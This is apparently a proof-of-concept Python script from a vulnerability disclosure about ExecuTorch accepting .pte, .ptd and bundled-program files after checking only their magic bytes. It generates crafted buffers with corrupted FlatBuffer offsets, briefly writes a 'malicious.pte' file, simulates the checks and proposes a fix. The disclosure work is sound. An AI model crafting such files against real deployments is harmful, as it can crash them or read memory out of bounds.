| |
| """ |
| ExecuTorch Missing FlatBuffer Verification (CWE-20 -> CWE-125) |
| ================================================================ |
| |
| Target: ExecuTorch (pytorch/executorch) |
| Commit: 90e6e4ca4ef369ce4288ffcd2a0210d5137117dd |
| |
| Affected Files: |
| - FlatTensor: extension/flat_tensor/flat_tensor_data_map.cpp |
| Only checks 4-byte magic "FT01", no VerifyFlatTensorBuffer() call |
| https://github.com/pytorch/executorch/blob/90e6e4ca4ef369ce4288ffcd2a0210d5137117dd/extension/flat_tensor/flat_tensor_data_map.cpp |
| |
| - BundledProgram: devtools/bundled_program/bundled_program.cpp |
| Only checks magic, no VerifyBundledProgramBuffer() call |
| https://github.com/pytorch/executorch/blob/90e6e4ca4ef369ce4288ffcd2a0210d5137117dd/devtools/bundled_program/bundled_program.cpp |
| |
| - Program: runtime/executor/program.cpp + program.h:84 |
| Defaults to Verification::Minimal (magic-only check) |
| https://github.com/pytorch/executorch/blob/90e6e4ca4ef369ce4288ffcd2a0210d5137117dd/runtime/executor/program.h#L84 |
| |
| CWE-20: Improper Input Validation |
| CWE-125: Out-of-bounds Read |
| |
| Description: |
| FlatBuffers provides a VerifyXxxBuffer() function that validates all internal |
| offsets and sizes within a serialized FlatBuffer before accessing them. Without |
| this verification, corrupted or maliciously crafted data can cause the |
| FlatBuffer accessors to return pointers to out-of-bounds memory. |
| |
| ExecuTorch accepts three types of serialized data: |
| 1. Program (.pte files) - defaults to Verification::Minimal (magic only) |
| 2. FlatTensor (.ptd files) - magic check only, NO verification API |
| 3. BundledProgram - magic check only, NO verification API |
| |
| In all three cases, the verification is insufficient. A valid 4-byte magic |
| header followed by corrupted FlatBuffer data will pass all checks but |
| cause OOB reads when the data is subsequently accessed. |
| |
| Impact: |
| Any malicious .pte, .ptd, or bundled program file with a valid magic header |
| but corrupted internal offsets can cause out-of-bounds memory reads, crashes, |
| or potentially code execution through controlled memory corruption. |
| """ |
|
|
| import struct |
| import sys |
| import os |
| import tempfile |
|
|
|
|
| |
| FLATBUFFER_HEADER_SIZE = 4 |
|
|
| |
| PROGRAM_MAGIC = b"ET12" |
| FLAT_TENSOR_MAGIC = b"FT01" |
| BUNDLED_MAGIC = b"BP01" |
|
|
|
|
| def create_valid_flatbuffer_skeleton(magic: bytes, total_size: int = 64) -> bytearray: |
| """ |
| Creates a minimal byte sequence that looks like a FlatBuffer with the |
| correct magic but with corrupted internal offsets. |
| |
| FlatBuffer wire format: |
| [0:4] - uint32_le: offset to root table (relative to position 0) |
| [4:8] - file_identifier (magic bytes like "ET12") |
| [8:...] - vtable, table data, etc. |
| |
| We set the root table offset to point within our buffer, but the |
| vtable and field offsets are corrupted to point out of bounds. |
| """ |
| buf = bytearray(total_size) |
|
|
| |
| struct.pack_into("<I", buf, 0, 8) |
|
|
| |
| buf[4:8] = magic |
|
|
| |
| |
| |
| struct.pack_into("<i", buf, 8, -4) |
| |
| |
| |
| struct.pack_into("<i", buf, 8, -8) |
|
|
| |
| |
| vtable_size = 12 |
| table_size = 32 |
| struct.pack_into("<HH", buf, 16, vtable_size, table_size) |
|
|
| |
| |
| struct.pack_into("<H", buf, 20, 0xFFF0) |
| struct.pack_into("<H", buf, 22, 0xFFF4) |
| struct.pack_into("<H", buf, 24, 0xFFF8) |
| struct.pack_into("<H", buf, 26, 0xFFFC) |
|
|
| return buf |
|
|
|
|
| def simulate_magic_only_check(data: bytes, expected_magic: bytes) -> dict: |
| """ |
| Simulates the magic-only verification used by ExecuTorch. |
| |
| For Program (program.cpp, Verification::Minimal): |
| const uint8_t* header = data + kMagicOffset; |
| if (memcmp(header, kMagic, kMagicSize) != 0) return InvalidProgram; |
| |
| For FlatTensor (flat_tensor_data_map.cpp): |
| if (memcmp(data + kMagicOffset, kExpectedFlatTensorMagic, kMagicSize) != 0) |
| return InvalidArgument; |
| |
| For BundledProgram: similar magic-only check. |
| """ |
| if len(data) < 8: |
| return {"passes": False, "reason": "Data too small"} |
|
|
| |
| actual_magic = data[4:8] |
| magic_matches = actual_magic == expected_magic |
|
|
| return { |
| "passes": magic_matches, |
| "actual_magic": actual_magic, |
| "expected_magic": expected_magic, |
| "data_size": len(data), |
| } |
|
|
|
|
| def simulate_full_verify(data: bytes) -> dict: |
| """ |
| Simulates what a proper FlatBuffer Verify would check. |
| |
| The Verify function walks all offsets in the buffer and checks: |
| 1. All offsets point within the buffer bounds |
| 2. All vtable sizes are valid |
| 3. All string/vector lengths are valid |
| 4. No overlapping regions |
| """ |
| if len(data) < 8: |
| return {"passes": False, "reason": "Data too small"} |
|
|
| issues = [] |
|
|
| |
| root_offset = struct.unpack_from("<I", data, 0)[0] |
| if root_offset >= len(data): |
| issues.append(f"Root table offset {root_offset} >= buffer size {len(data)}") |
|
|
| if root_offset + 4 <= len(data): |
| |
| vtable_soffset = struct.unpack_from("<i", data, root_offset)[0] |
| vtable_pos = root_offset - vtable_soffset |
| if vtable_pos < 0 or vtable_pos >= len(data): |
| issues.append(f"VTable position {vtable_pos} out of bounds [0, {len(data)})") |
| elif vtable_pos + 4 <= len(data): |
| vtable_size = struct.unpack_from("<H", data, vtable_pos)[0] |
| table_size = struct.unpack_from("<H", data, vtable_pos + 2)[0] |
|
|
| if vtable_pos + vtable_size > len(data): |
| issues.append(f"VTable extends past buffer: {vtable_pos}+{vtable_size} > {len(data)}") |
|
|
| |
| num_fields = (vtable_size - 4) // 2 |
| for i in range(num_fields): |
| field_off_pos = vtable_pos + 4 + i * 2 |
| if field_off_pos + 2 <= len(data): |
| field_offset = struct.unpack_from("<H", data, field_off_pos)[0] |
| if field_offset != 0: |
| absolute_pos = root_offset + field_offset |
| if absolute_pos >= len(data): |
| issues.append( |
| f"Field {i} offset {field_offset} -> absolute {absolute_pos} " |
| f">= buffer size {len(data)}") |
|
|
| return { |
| "passes": len(issues) == 0, |
| "issues": issues, |
| } |
|
|
|
|
| def main(): |
| print("=" * 78) |
| print("ExecuTorch Missing FlatBuffer Verification PoC") |
| print("CWE-20 (Improper Input Validation) -> CWE-125 (OOB Read)") |
| print("=" * 78) |
| print() |
|
|
| |
| |
| |
| print("-" * 78) |
| print("STEP 1: Create malicious buffers with valid magic but corrupted offsets") |
| print("-" * 78) |
| print() |
|
|
| formats = [ |
| ("Program (.pte)", PROGRAM_MAGIC, "program.h:84 — Verification::Minimal"), |
| ("FlatTensor (.ptd)", FLAT_TENSOR_MAGIC, "flat_tensor_data_map.cpp — magic only"), |
| ("BundledProgram", BUNDLED_MAGIC, "bundled_program.cpp — magic only"), |
| ] |
|
|
| for name, magic, location in formats: |
| print(f" [{name}]") |
| print(f" Verification: {location}") |
| print() |
|
|
| malicious = create_valid_flatbuffer_skeleton(magic, total_size=64) |
|
|
| |
| print(f" Buffer ({len(malicious)} bytes):") |
| for i in range(0, len(malicious), 16): |
| hex_part = " ".join(f"{b:02X}" for b in malicious[i:i+16]) |
| ascii_part = "".join(chr(b) if 32 <= b < 127 else "." for b in malicious[i:i+16]) |
| print(f" {i:04X}: {hex_part:<48s} {ascii_part}") |
| print() |
|
|
| |
| magic_result = simulate_magic_only_check(bytes(malicious), magic) |
| print(f" Magic-only check: {'PASS' if magic_result['passes'] else 'FAIL'}") |
| print(f" Expected: {magic_result['expected_magic']}") |
| print(f" Actual: {magic_result['actual_magic']}") |
| print() |
|
|
| |
| verify_result = simulate_full_verify(bytes(malicious)) |
| print(f" Full FlatBuffer verify: {'PASS' if verify_result['passes'] else 'FAIL'}") |
| if verify_result.get("issues"): |
| for issue in verify_result["issues"]: |
| print(f" - {issue}") |
| print() |
|
|
| if magic_result["passes"] and not verify_result["passes"]: |
| print(f" >>> VULNERABILITY: Magic check PASSES but buffer is CORRUPTED <<<") |
| print(f" >>> Subsequent FlatBuffer field accesses will read OOB memory <<<") |
| print() |
|
|
| |
| |
| |
| print("-" * 78) |
| print("STEP 2: Create concrete malicious .pte file") |
| print("-" * 78) |
| print() |
|
|
| malicious_pte = create_valid_flatbuffer_skeleton(PROGRAM_MAGIC, total_size=64) |
|
|
| |
| tmpdir = tempfile.mkdtemp(prefix="executorch_poc_") |
| pte_path = os.path.join(tmpdir, "malicious.pte") |
| with open(pte_path, "wb") as f: |
| f.write(malicious_pte) |
|
|
| print(f" Written malicious .pte to: {pte_path}") |
| print(f" File size: {len(malicious_pte)} bytes") |
| print() |
| print(" This file has:") |
| print(f" - Valid magic: {PROGRAM_MAGIC} at offset 4") |
| print(f" - Root table offset: {struct.unpack_from('<I', malicious_pte, 0)[0]}") |
| print(f" - Corrupted field offsets: 0xFFF0, 0xFFF4, 0xFFF8, 0xFFFC") |
| print(f" - These offsets resolve to absolute positions 65528-65540") |
| print(f" - Buffer is only 64 bytes, so all accesses are OOB") |
| print() |
|
|
| |
| os.unlink(pte_path) |
| os.rmdir(tmpdir) |
|
|
| |
| |
| |
| print("-" * 78) |
| print("STEP 3: Code Analysis — Where verification is missing") |
| print("-" * 78) |
| print() |
|
|
| print(" 1. Program (runtime/executor/program.h:84):") |
| print(" Default: Verification::Minimal") |
| print() |
| print(' static Result<Program> load(') |
| print(' DataLoader* loader,') |
| print(' Program::Verification verification =') |
| print(' Program::Verification::Minimal); // <-- DEFAULT: magic only!') |
| print() |
| print(" Even when InternalConsistency is used, it only calls") |
| print(" flatbuffers::Verifier which has known limitations with") |
| print(" nested FlatBuffers and union types.") |
| print() |
|
|
| print(" 2. FlatTensor (extension/flat_tensor/flat_tensor_data_map.cpp):") |
| print() |
| print(' // Only checks magic — NO VerifyFlatTensorBuffer()') |
| print(' const uint8_t* magic = data + FlatTensorHeader::kMagicOffset;') |
| print(' if (memcmp(magic, FlatTensorHeader::kExpectedMagic,') |
| print(' FlatTensorHeader::kMagicSize) != 0) {') |
| print(' return Error::InvalidArgument;') |
| print(' }') |
| print(' // Immediately uses GetFlatTensor(data) without verification') |
| print(' auto* flat_tensor = flatbuffers::GetRoot<FlatTensor>(data);') |
| print() |
| print(" Missing: flatbuffers::Verify(data, size) before GetRoot()") |
| print() |
|
|
| print(" 3. BundledProgram (devtools/bundled_program/bundled_program.cpp):") |
| print() |
| print(' // Only checks magic — NO VerifyBundledProgramBuffer()') |
| print(' if (!IsBundledProgram(file_data)) { return Error; }') |
| print(' // IsBundledProgram only checks the magic bytes') |
| print(' auto* bundled_program = GetBundledProgram(file_data);') |
| print() |
| print(" Missing: VerifyBundledProgramBuffer() before GetBundledProgram()") |
| print() |
|
|
| |
| |
| |
| print("-" * 78) |
| print("STEP 4: What happens when corrupted FlatBuffer is accessed") |
| print("-" * 78) |
| print() |
|
|
| print(" After the magic check passes, ExecuTorch calls FlatBuffer accessors") |
| print(" like program->execution_plan(), tensor->sizes(), etc.") |
| print() |
| print(" With corrupted offsets, these accessors compute pointers like:") |
| print() |
|
|
| buf_base = 0x7F0000000000 |
| buf_size = 64 |
| root_table = buf_base + 8 |
| corrupted_field_offsets = [0xFFF0, 0xFFF4, 0xFFF8, 0xFFFC] |
|
|
| for i, field_off in enumerate(corrupted_field_offsets): |
| absolute_addr = root_table + field_off |
| oob_distance = (root_table + field_off) - (buf_base + buf_size) |
| print(f" Field {i}: table_addr(0x{root_table:X}) + offset(0x{field_off:X}) = 0x{absolute_addr:X}") |
| print(f" Buffer ends at 0x{buf_base + buf_size:X}") |
| print(f" OOB by {oob_distance} bytes") |
| print(f" >>> Reads {4 + i * 4} bytes of unrelated heap memory <<<") |
| print() |
|
|
| |
| |
| |
| print("-" * 78) |
| print("STEP 5: Null deref angle (FlatTensor optional fields)") |
| print("-" * 78) |
| print() |
| print(" flat_tensor_data_map.cpp:93-97 accesses optional FlatBuffer fields") |
| print(" without null checks:") |
| print() |
| print(' auto* sizes = tensor_metadata->sizes(); // Can be nullptr') |
| print(' auto* dim_order = tensor_metadata->dim_order(); // Can be nullptr') |
| print(' size_t num_dims = sizes->size(); // CRASH: null dereference') |
| print() |
| print(" A FlatBuffer with the sizes field offset set to 0 (not present)") |
| print(" will cause sizes() to return nullptr, then ->size() crashes.") |
| print() |
|
|
| |
| |
| |
| print("=" * 78) |
| print("SUMMARY") |
| print("=" * 78) |
| print() |
| print(" ExecuTorch uses only magic-byte verification for all three serialized") |
| print(" data formats (Program, FlatTensor, BundledProgram). This means any") |
| print(" 64-byte file with the correct 4-byte magic header will be accepted") |
| print(" and parsed, even if internal FlatBuffer offsets are corrupted.") |
| print() |
| print(" The FlatBuffers library provides VerifyXxxBuffer() functions that") |
| print(" validate all internal offsets before use. ExecuTorch either:") |
| print(" - Defaults to Verification::Minimal (Program)") |
| print(" - Has no verification API at all (FlatTensor, BundledProgram)") |
| print() |
| print(" Fix: Call the appropriate FlatBuffer Verify function for each format") |
| print(" before accessing any fields. For Program, change the default to") |
| print(" Verification::InternalConsistency. For FlatTensor and BundledProgram,") |
| print(" add and use VerifyFlatTensorBuffer() / VerifyBundledProgramBuffer().") |
|
|
| return 1 |
|
|
|
|
| if __name__ == "__main__": |
| sys.exit(main()) |
|
|